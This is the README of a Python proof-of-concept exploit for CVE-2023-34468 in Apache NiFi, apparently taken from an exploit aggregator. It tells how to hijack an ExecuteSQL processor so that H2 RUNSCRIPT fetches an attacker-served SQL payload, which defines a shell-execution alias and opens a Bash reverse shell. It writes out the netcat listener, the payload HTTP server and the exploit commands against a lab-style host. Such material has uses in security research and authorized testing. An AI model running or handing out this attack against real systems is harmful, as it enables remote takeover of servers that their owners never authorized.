## https://sploitus.com/exploit?id=14748680-800D-5A5B-8F0A-8FAAA6421030
# CVE-2023-34468 โ Apache NiFi ExecuteSQL H2 RUNSCRIPT RCE PoC
Short Python PoC for abusing an editable Apache NiFi ExecuteSQL processor with an H2 `RUNSCRIPT` payload to trigger remote command execution through a Bash reverse shell.
> **For authorized testing and research only. Do not use against systems you do not own or have explicit permission to test.**
---
## What it does
```text
ExecuteSQL processor update -> H2 RUNSCRIPT fetch -> Bash reverse shell -> processor restore
```
1. Discovers a single ExecuteSQL processor automatically, or accepts `--processor-id` manually.
2. Writes a local `rce.sql` payload that defines and calls a Java-backed shell execution alias.
3. Prompts you to start your own `nc` listener and HTTP server.
4. Updates the processor query to fetch `rce.sql` through H2 `RUNSCRIPT`.
5. Starts the processor to trigger the reverse shell.
6. Restores the original processor configuration after you confirm the shell landed.
---
## Screenshots
### 1. Setup

### 2. Request to payload

### 3. Shell received

### 4. Result

---
## Setup
```bash
git clone https://github.com/ozcanpng/CVE-2023-34468.git
cd CVE-2023-34468
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
```
---
## Usage
Terminal 1:
```bash
rlwrap nc -lvnp 4444
```
Terminal 2, from this repo directory:
```bash
python3 -m http.server 8000
```
Terminal 3:
```bash
python3 CVE-2023-34468.py --url http://flow.helix.htb --lhost 10.10.16.53 --lport 4444
```
For manual processor selection:
```bash
python3 CVE-2023-34468.py --url http://flow.helix.htb --processor-id --lhost 10.10.16.53 --lport 4444
```
---
## Affected
| Product | Affected Version | Access Required | Impact |
|---------|------------------|-----------------|--------|
| Apache NiFi | CVE-2023-34468 affected deployments using editable ExecuteSQL/H2 behavior | Ability to reach and modify the target NiFi processor through the API | Remote command execution |
---
## Notes
- The script assumes the NiFi API is reachable and the current user/session can modify the target processor.
- The generated `rce.sql` file is ignored by git and should be served from the repo directory with `python3 -m http.server`.
- If automatic discovery finds no processor or multiple candidates, pass the processor UUID manually with `--processor-id`.
- The script attempts to restore the original ExecuteSQL processor configuration after you confirm the shell landed.
---
## References
- [NVD โ CVE-2023-34468](https://nvd.nist.gov/vuln/detail/CVE-2023-34468)
- [Apache NiFi](https://nifi.apache.org/)
- [H2 Database Commands](https://www.h2database.com/html/commands.html)
---
## Author
ozcanpng โ [github.com/ozcanpng](https://github.com/ozcanpng) โ [ozcanpng.dev](https://ozcanpng.dev)